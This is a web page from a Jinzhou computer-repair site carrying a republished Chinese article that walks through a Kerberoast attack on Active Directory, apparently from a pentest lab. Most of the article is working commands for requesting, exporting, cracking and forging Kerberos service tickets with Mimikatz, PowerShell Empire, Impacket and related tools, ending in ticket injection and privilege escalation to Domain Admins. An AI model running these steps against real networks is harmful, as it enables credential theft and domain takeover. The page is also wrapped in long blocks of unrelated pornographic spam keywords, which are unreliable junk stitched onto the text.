国产精品久av福利在线观看_亚洲一区国产精品_亚洲黄色一区二区三区_欧美成人xxxx_国产精品www_xxxxx欧美_国产精品久久婷婷六月丁香_国产特级毛片

錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務(wù)項目 服務(wù)報價 維修流程 IT外包服務(wù) 服務(wù)器維護(hù) 技術(shù)文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù)技術(shù)文章
破解Kerberos服務(wù)票據(jù),詳細(xì)的Kerberoast攻擊演示

作者: 佚名  日期:2018-06-26 21:24:45   來源: 本站整理

 簡單直白的說Kerberoast攻擊,就是攻擊者為了獲取目標(biāo)服務(wù)的訪問權(quán)限,而設(shè)法破解Kerberos服務(wù)票據(jù)并重寫它們的過程。這是紅隊當(dāng)中非常常見的一種攻擊手法,因為它不需要與服務(wù)目標(biāo)服務(wù)進(jìn)行任何交互,并且可以使用合法的活動目錄訪問來請求和導(dǎo)出可以離線破解的服務(wù)票據(jù),以獲取到最終的明文密碼。之所以出現(xiàn)這種情況,是因為服務(wù)票據(jù)使用服務(wù)帳戶的散列(NTLM)進(jìn)行加密,所以任何域用戶都可以從服務(wù)轉(zhuǎn)儲散列,而無需將shell引入運(yùn)行該服務(wù)的系統(tǒng)中。
攻擊者通常會選擇那些可能設(shè)置了弱密,碼破解成功率較高的票據(jù)來嘗試破解。一旦攻擊者成功破解出了票據(jù),他們有時不僅僅獲取的只是服務(wù)訪問權(quán)限,如果服務(wù)被配置為在高權(quán)限下運(yùn)行,那么整個域都將可能被攻擊者拿下。這些票據(jù)可以通過考慮多種因素來識別,例如:
SPNs綁定到域用戶賬戶
最后一次密碼設(shè)置(Password last set)
密碼過期時間
最后一次登錄(Last logon)
具體來說,Kerberoast攻擊涉及以下五個步驟:
服務(wù)主體名稱(SPN)發(fā)現(xiàn)
請求服務(wù)票據(jù)
導(dǎo)出服務(wù)票據(jù)
破解服務(wù)票據(jù)
重寫服務(wù)票據(jù)&RAM注入
在服務(wù)主體名稱(SPN)發(fā)現(xiàn)這篇文章中,已經(jīng)為大家介紹了如何通過查詢Active Directory的服務(wù)主體名稱,來發(fā)現(xiàn)網(wǎng)絡(luò)中服務(wù)的方法。
請求服務(wù)票據(jù)
為特定SPN請求服務(wù)票據(jù)的最簡單方法是通過PowerShell,這個方法是Tim Medin在DerbyCon 4.0演講中介紹的。
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"

執(zhí)行klist命令將列出所有可用的緩存票據(jù)。
klist

請求服務(wù)票據(jù)的另一種解決方案是通過Mimikatz指定服務(wù)主體名稱作為目標(biāo)。
kerberos::ask /target:PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80

與klist類似,內(nèi)存中存在的Kerberos票據(jù)列表可以通過Mimikatz來檢索。從現(xiàn)有的PowerShell會話中,Invoke-Mimikatz腳本將輸出所有票據(jù)。
Invoke-Mimikatz -Command '"kerberos::list"'

或者,加載Kiwi模塊添加一些額外的Mimikatz命令,它們也可以執(zhí)行相同的任務(wù)。
load kiwi
kerberos_ticket_list

還或者可以通過執(zhí)行一個自定義的Kiwi命令:
kiwi_cmd kerberos::list

Impacket中有一個python模塊,它可以請求僅屬于域用戶的Kerberos服務(wù)票據(jù),與計算機(jī)帳戶服務(wù)票據(jù)相比應(yīng)該更易于破解。但是,想要與Active Directory進(jìn)行交互,需要有效的域憑據(jù),因為它將從不屬于域的系統(tǒng)執(zhí)行。
./GetUserSPNs.py -request pentestlab.local/test

服務(wù)帳戶哈希也將以John the Ripper格式檢索。

使用Matan Hart開發(fā)的PowerShell模塊可以幫助我們自動識別弱服務(wù)票據(jù),該模塊是RiskySPN中的一部分。主要作用是對屬于用戶的可用服務(wù)票據(jù)執(zhí)行審計,并根據(jù)用戶帳戶和密碼過期時限來查找最容易包含弱密碼的票據(jù)。
Find-PotentiallyCrackableAccounts -FullData -Verbose

該腳本將提供比klist和Mimikatz更詳細(xì)的輸出,包括組信息,密碼有效期和破解窗口。

使用domain參數(shù)執(zhí)行同一模塊,將返回所有具有關(guān)聯(lián)服務(wù)主體名稱的用戶帳戶。
Find-PotentiallyCrackableAccounts -Domain "pentestlab.local"

服務(wù)票據(jù)信息也可以以CSV格式導(dǎo)出,以便離線查看。
Export-PotentiallyCrackableAccounts
所有出現(xiàn)在控制臺中的票據(jù)信息都將被寫入文件中。

這里還有一個腳本(相同存儲庫的一部分),可以通過其SPN為服務(wù)實例獲取服務(wù)票據(jù)。
Get-TGSCipher -SPN "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"

 Tim Medin的Kerberoast工具包已實現(xiàn)流程的自動化。Auto-Kerberoast中包含了Tim的原始腳本,其中包含兩個可執(zhí)行各種功能的PowerShell腳本,例如以Base64, John和Hashcat格式列出和導(dǎo)出服務(wù)票據(jù)等。
List-UserSPNs

還有一個domain參數(shù)可以只列出特定域的SPN。
List-UserSPNs -Domain "pentestlab.local"

導(dǎo)出服務(wù)票據(jù)
Mimikatz是可以導(dǎo)出Kerberos服務(wù)票據(jù)的標(biāo)準(zhǔn)工具。從PowerShell會話中,以下命令將列出內(nèi)存中的所有可用票據(jù),并將其保存在遠(yuǎn)程主機(jī)中。
Invoke-Mimikatz -Command '"kerberos::list /export"'

同樣,PowerShell Empire有一個模塊可以自動完成Kerberos服務(wù)票據(jù)提取任務(wù)。
usemodule credentials/mimikatz/extract_tickets

該模塊將使用Invoke-Mimikatz函數(shù)自動執(zhí)行以下命令。
standard::base64
kerberos::list /export

支持Kerberos身份驗證的服務(wù)票據(jù)哈希可以直接使用PowerShell Empire模塊提取。哈希的格式可以提取為John或Hashcat。
usemodule credentials/invoke_kerberoast

該模塊將檢索所有服務(wù)帳戶的密碼哈希值。

 AutoKerberoast PowerShell腳本將請求并提取base64格式的所有服務(wù)票據(jù)。
Invoke-AutoKerberoast

AutoKerberoast存儲庫中還有一個腳本,它將以hashcat兼容格式顯示提取的票據(jù)。

屬于特定域的提升組的票據(jù)也可以提取用于更具針對性的Kerberoasting。
Invoke-AutoKerberoast -GroupName "Domain Admins" -Domain pentestlab.local -HashFormat John

Matan Hart開發(fā)的Get-TGSCipher PowerShell模塊,可以以三種不同的格式提取服務(wù)票據(jù)的密碼哈希值:John,Hashcat和Kerberoast?梢栽赟PN發(fā)現(xiàn)過程中檢索腳本所需的關(guān)聯(lián)服務(wù)的服務(wù)主體名稱。
Get-TGSCipher -SPN "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80" -Format John
TGSCipher - Service Ticket Hash

使用Get-TGSCipher函數(shù)的好處是,無需使用Mimikatz導(dǎo)出票據(jù),這可以大大降低警報的觸發(fā),以及省去將票據(jù)轉(zhuǎn)換為john格式的步驟。
破解服務(wù)票據(jù)
python腳本tgsrepcrack是Tim Medin Kerberoast工具包的一部分,可以通過提供的密碼列表來破解Kerberos票據(jù)。
python tgsrepcrack.py /root/Desktop/passwords.txt PENTESTLAB_001.kirbi

Lee Christensen開發(fā)了一個名為extractServiceTicketParts的python腳本,它可以為我們提取服務(wù)票據(jù)的哈希值,以及一款Go語言編寫的哈希破解器tgscrack ,兩者可以配合使用。

python extractServiceTicketParts.py PENTESTLAB_001.kirbi

tgscrack需要我們?yōu)槠渲付üN募约白值湮募谋镜卮娣怕窂健?/span>
tgscrack.exe -hashfile hash.txt -wordlist passwords.txt

密碼將以明文顯示。
如果PowerShell remoting已啟用,則可以使用從服務(wù)票據(jù)中檢索的密碼執(zhí)行遠(yuǎn)程命令等操作。
Enable-PSRemoting
$pass = 'Password123' | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList 'PENTESTLAB_001', $pass
Invoke-Command -ScriptBlock {get-process} -ComputerName WIN-PTELU2U07KG.PENTESTLAB.LOCAL -Credential $creds

正在運(yùn)行的進(jìn)程列表將被檢索

服務(wù)票據(jù)重寫&RAM注入
Kerberos票據(jù)使用密碼的NTLM哈希簽名。如果票據(jù)散列已被破解,那么可以使用Kerberoast python腳本重寫票據(jù)。這將允許在服務(wù)將被訪問時模擬任何域用戶或偽造賬戶。此外,提權(quán)也是可能的,因為用戶可以被添加到諸如域管理員的高權(quán)限組中。
python kerberoast.py -p Password123 -r PENTESTLAB_001.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p Password123 -r PENTESTLAB_001.kirbi -w PENTESTLAB.kirbi -g 512

使用以下Mimikatz命令將新票據(jù)重新注入內(nèi)存,以便通過Kerberos協(xié)議對目標(biāo)服務(wù)執(zhí)行身份驗證。
kerberos::ptt PENTESTLAB.kirbi
 


熱門文章
  • 機(jī)械革命S1 PRO-02 開機(jī)不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機(jī)SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來減少網(wǎng)絡(luò)請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機(jī)始終停留在開機(jī)界面...
  • 常見打印機(jī)清零步驟
  • 安裝驅(qū)動時提示不包含數(shù)字簽名的解...
  • 共享打印機(jī)需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機(jī)的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護(hù),上門維修電腦,黑屏藍(lán)屏死機(jī)故障排除,無線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    欧美熟妇另类久久久久久不卡| 欧美精品第1页| 天天操天天干天天摸| 亚洲va中文字幕| 欧洲女同同性吃奶| 波多野结衣欧美| 97人人模人人爽人人喊中文字| 欧美孕妇与黑人巨交| 中文字幕精品—区二区四季| 亚洲成在人线免费视频 | 日韩三级电影网| 国产不卡在线观看| 欧美日韩大片| 伦av综合一区| 欧美精品18videos性欧美| 你懂得在线网址| 久久亚洲中文字幕无码| 精品久久香蕉国产线看观看亚洲 | 精品成在人线av无码免费看| 国产三级一区| 国产精品igao激情视频 | 精品自拍视频在线观看| 人人澡人人添人人爽一区二区| 91精品国产色综合久久| 97国产成人无码精品久久久| 久久男人中文字幕资源站| 99久久精品久久亚洲精品| 日本vs亚洲vs韩国一区三区二区 | www.日本少妇| 一本精品一区二区三区| 国产精品毛片一区二区在线看舒淇 | 四虎4hu新地址入口2023| 日韩精品久久久| 99国产精品久久久久久久成人热| 久久只有这里有精品| 国产精品88888| 国产成人无码一区二区在线播放| 欧美日韩精品系列| 国产5g影院天天爽天天看| 欧美日韩大陆一区二区| 午夜网站在线观看| 国产男女无遮挡| 久久精品一区二区三区不卡牛牛| 精品国产一区二区三区不卡在线 | 91麻豆精品激情在线观看最新| 中文字幕一区二区三区在线不卡| 成人黄色大片在线观看| 青娱乐免费在线视频| 日韩精品中文字幕在线不卡尤物| 国产精品视屏| 日韩黄色在线播放| 日本福利一区二区| 中出在线观看| 天天做天天躁天天躁| 国产精品久久久久久久久久辛辛| 三级影片在线观看| 精品无人区太爽高潮在线播放| 国产一区清纯| 羞羞网www| 国产精品国产三级国产专区51| 久久久综合激的五月天| 成年人免费在线视频| 日本a√在线观看| 久久久不卡网国产精品一区| 狠狠干夜夜草| 国产精品视频免费一区| 欧美a级片网站| av网站免费播放| 午夜精品久久久久久不卡8050| 在线亚洲日本| 久久成人免费视频| 校园春色亚洲色图| 加勒比av中文字幕| 精品剧情在线观看| а√最新版地址在线天堂| 玉米视频成人免费看| 99在线播放| 艳妇乳肉亭妇荡乳av| 91一区二区在线| 欧美高清视频一二三区| 97超级碰碰| 国产一二三av| 久草在线在线视频| 亚洲盗摄视频| 亚洲成人精品影院| 亚洲综合成人婷婷小说| 免费在线观看a视频| h视频在线观看网站| 亚洲另类春色校园小说| 亚洲成a人片在线观看中文| 国产原创欧美精品| 成人欧美一区二区三区黑人一| 久草福利资源站| 99久久99视频只有精品| 欧美偷拍一区二区| 五月天国产一区| 波多野结衣不卡| 在线观看电影av| 国产91精品久久久久久久网曝门| 久久精品欧美视频| 一级 黄 色 片一| 色视频在线免费| 亚洲天堂日韩在线| 欧美日韩亚洲一区二区| 精品国产乱码久久久久久久软件| 久久精品波多野结衣| 深夜福利视频一区| 久久久xxx| 亚洲一级一级97网| 视频在线观看免费高清| 精品一区二区三区免费站 | 99成人精品| 亚洲精品在线观| www.com毛片| 在线成人综合色一区| 一区二区在线免费播放| 洋洋成人永久网站入口| 国产精品免费视频一区二区| 久久夜靖品2区| 95在线视频| 成人丝袜高跟foot| 国产精品高潮呻吟久久av野狼 | 国产精品av免费| 亚洲国产视频一区二区三区| 欧美暴力调教| 亚洲免费三区一区二区| 久久久久天天天天| 人人妻人人藻人人爽欧美一区| 偷偷要色偷偷| 麻豆免费精品视频| 久久全球大尺度高清视频| 亚洲精品一区二区三区影院忠贞| 黄色小视频在线播放| 青青草一区二区三区| 亚洲2020天天堂在线观看| 国产精品69久久久久孕妇欧美| wwwxxx在线观看| 91免费观看在线| 国产传媒一区二区| 人与动物性xxxx| 在线观看免费高清完整| 国产亚洲一二三区| 精品一区二区三区日本| 国产按摩一区二区三区| 日本精品在线观看| 欧美一区二区播放| 亚洲综合在线一区二区| 福利网址在线| 国产成都精品91一区二区三| 91欧美精品成人综合在线观看| 中文字幕在线观看免费| 国产在线激情| 中文字幕乱码久久午夜不卡 | 国产香蕉久久精品综合网| 精品婷婷色一区二区三区蜜桃| 亚洲一区二区色| 色妞ww精品视频7777| 91精品午夜视频| 一级做a免费视频| 午夜国产在线| 国产欧美视频在线观看| 日韩欧美亚洲v片| 久久精品国产亚洲777| 国户精品久久久久久久久久久不卡| 欧美成人免费全部观看天天性色| 久久免费看少妇高潮v片特黄| 日本蜜桃在线观看视频| 欧洲一区二区三区在线| 亚洲色图久久久| 午夜影院在线免费观看| 久久久久国产精品麻豆| 精品污污网站免费看| 国产一区免费电影| 国产精品pans私拍| 中文字幕在线2019| 日韩在线亚洲| 精品国产91洋老外米糕| 韩国女同性做爰三级| 国产蜜臀一区二区打屁股调教| 午夜精品福利视频网站| 一本色道无码道dvd在线观看| 国产经典视频一区| 久久综合丝袜日本网| 宅男av一区二区三区| 激情网址大全| 国产成都精品91一区二区三| 欧美激情一区二区三区在线视频 | 97热在线精品视频在线观看| 天天操夜夜操视频| 伊人久久大香线蕉综合网站 | 国产精品综合激情| 免费看成一片| 国产精品乱码一区二三区小蝌蚪| www婷婷av久久久影片| 日本欧洲一区| 亚洲特黄一级片| 日本福利一区二区三区| www视频在线播放| 久久人人97超碰com| 国产午夜伦鲁鲁|